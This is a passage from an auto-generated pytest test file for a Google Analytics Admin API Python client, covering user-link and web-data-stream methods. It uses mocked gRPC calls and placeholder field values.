resources.UserLink(name="name_value") @pytest.mark.asyncio async def test_update_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_user_link( analytics_admin.UpdateUserLinkRequest(), user_link=resources.UserLink(name="name_value"), ) def test_batch_update_user_links( transport: str = "grpc", request_type=analytics_admin.BatchUpdateUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.BatchUpdateUserLinksResponse() response = client.batch_update_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchUpdateUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchUpdateUserLinksResponse) def test_batch_update_user_links_from_dict(): test_batch_update_user_links(request_type=dict) def test_batch_update_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: client.batch_update_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchUpdateUserLinksRequest() @pytest.mark.asyncio async def test_batch_update_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.BatchUpdateUserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchUpdateUserLinksResponse() ) response = await client.batch_update_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchUpdateUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchUpdateUserLinksResponse) @pytest.mark.asyncio async def test_batch_update_user_links_async_from_dict(): await test_batch_update_user_links_async(request_type=dict) def test_batch_update_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchUpdateUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: call.return_value = analytics_admin.BatchUpdateUserLinksResponse() client.batch_update_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_batch_update_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchUpdateUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchUpdateUserLinksResponse() ) await client.batch_update_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_delete_user_link( transport: str = "grpc", request_type=analytics_admin.DeleteUserLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteUserLinkRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_user_link_from_dict(): test_delete_user_link(request_type=dict) def test_delete_user_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: client.delete_user_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteUserLinkRequest() @pytest.mark.asyncio async def test_delete_user_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteUserLinkRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteUserLinkRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_user_link_async_from_dict(): await test_delete_user_link_async(request_type=dict) def test_delete_user_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteUserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: call.return_value = None client.delete_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_user_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteUserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_user_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_user_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_user_link( analytics_admin.DeleteUserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_user_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_user_link( analytics_admin.DeleteUserLinkRequest(), name="name_value", ) def test_batch_delete_user_links( transport: str = "grpc", request_type=analytics_admin.BatchDeleteUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_delete_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.batch_delete_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchDeleteUserLinksRequest() # Establish that the response is the type that we expect. assert response is None def test_batch_delete_user_links_from_dict(): test_batch_delete_user_links(request_type=dict) def test_batch_delete_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_delete_user_links), "__call__" ) as call: client.batch_delete_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchDeleteUserLinksRequest() @pytest.mark.asyncio async def test_batch_delete_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.BatchDeleteUserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_delete_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.batch_delete_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchDeleteUserLinksRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_batch_delete_user_links_async_from_dict(): await test_batch_delete_user_links_async(request_type=dict) def test_batch_delete_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchDeleteUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_delete_user_links), "__call__" ) as call: call.return_value = None client.batch_delete_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_batch_delete_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchDeleteUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_delete_user_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.batch_delete_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_get_web_data_stream( transport: str = "grpc", request_type=analytics_admin.GetWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) response = client.get_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" def test_get_web_data_stream_from_dict(): test_get_web_data_stream(request_type=dict) def test_get_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: client.get_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetWebDataStreamRequest() @pytest.mark.asyncio async def test_get_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) ) response = await client.get_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_get_web_data_stream_async_from_dict(): await test_get_web_data_stream_async(request_type=dict) def test_get_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetWebDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: call.return_value = resources.WebDataStream() client.get_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetWebDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) await client.get_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_web_data_stream( analytics_admin.GetWebDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_web_data_stream( analytics_admin.GetWebDataStreamRequest(), name="name_value", ) def test_delete_web_data_stream( transport: str = "grpc", request_type=analytics_admin.DeleteWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteWebDataStreamRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_web_data_stream_from_dict(): test_delete_web_data_stream(request_type=dict) def test_delete_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: client.delete_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteWebDataStreamRequest() @pytest.mark.asyncio async def test_delete_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteWebDataStreamRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_web_data_stream_async_from_dict(): await test_delete_web_data_stream_async(request_type=dict) def test_delete_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteWebDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: call.return_value = None client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteWebDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_web_data_stream( analytics_admin.DeleteWebDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_web_data_stream( analytics_admin.DeleteWebDataStreamRequest(), name="name_value", ) def test_update_web_data_stream( transport: str = "grpc", request_type=analytics_admin.UpdateWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) response = client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" def test_update_web_data_stream_from_dict(): test_update_web_data_stream(request_type=dict) def test_update_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: client.update_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateWebDataStreamRequest() @pytest.mark.asyncio async def test_update_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) ) response = await client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_update_web_data_stream_async_from_dict(): await test_update_web_data_stream_async(request_type=dict) def test_update_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateWebDataStreamRequest() request.web_data_stream.name = "web_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: call.return_value = resources.WebDataStream() client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "web_data_stream.name=web_data_stream.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateWebDataStreamRequest() request.web_data_stream.name = "web_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) await client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "web_data_stream.name=web_data_stream.name/value", ) in kw["metadata"] def test_update_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_web_data_stream( web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].web_data_stream == resources.WebDataStream(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_web_data_stream( analytics_admin.UpdateWebDataStreamRequest(), web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword 